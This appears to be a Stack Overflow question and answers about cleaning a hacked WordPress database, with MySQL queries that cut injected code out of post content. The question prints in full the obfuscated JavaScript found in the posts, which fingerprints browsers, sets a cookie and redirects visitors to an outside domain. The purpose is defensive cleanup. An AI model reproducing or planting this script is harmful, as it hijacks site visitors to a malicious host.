# Query for MySQL to search string, and replace same column with substring from 0 to string found position

Tags: mysql, sql, wordpress, sql-update, virus

I'm removing a wordpress attack who independent of the files, update all the wp_posts table with malicious script.
An example of a the column post_content is the following:

```
<p>[/mvc_price_listing][/vc_column_inner][vc_column_inner width="1/2"][promo_banner image="9510"][/promo_banner][mvc_price_listing price_visibility="none" price_title="Ladrillo Fiscal Artesanal<br />
<small>Generico</small>" top_bg="#c41200"]</p>
<p>[/mvc_price_listing][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width="1/6"][/vc_column][/vc_row]</p>
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://ischeck.xyz/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
```

So I found all the virus scripts are in the last of the content, the length is dynamic, and always start with: "var _0x2cf4"

So my question is what I have to do for execute a query for wp_posts table, who replace the content of post_content with only the first part until "var _0x2cf4" wheere found.

Thanks you very much :)

Answer (score 1, accepted):

You appear to have been hit by a [Overzoruaon](https://malwaretips.com/blogs/remove-overzoruaon-com/) adware spreading bot. The number "_0x2cf4" is actually **random** and might change between attempts, so best not to rely on that.

You actually want to remove the `<script>` tag. So I think

```
UPDATE wp_posts SET post_content = SUBSTRING_INDEX(post_content, '<script>', 1);
```

will delete everything from the first `<script>` onwards, included.

Also, I strongly suggest you to install a XSS-defense plugin and/or make `<script` (no closing angle bracket) a forbidden word.

Answer (score 1):

You can use string functions:

```
update wp_posts 
set post_content = substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
```

`locate('_0x2cf4', post_content)` gives you the index of `''_0x2cf4'` within `post_content`; you can then take everything from the start of the string until that position, minus 1. The `where` clause ensures that only "infected" values are updated.

Before running the `update` query, you can make sure that it produces the expectd result with the following `select`:

```
select 
    post_content, 
    substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
from wp_posts
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
```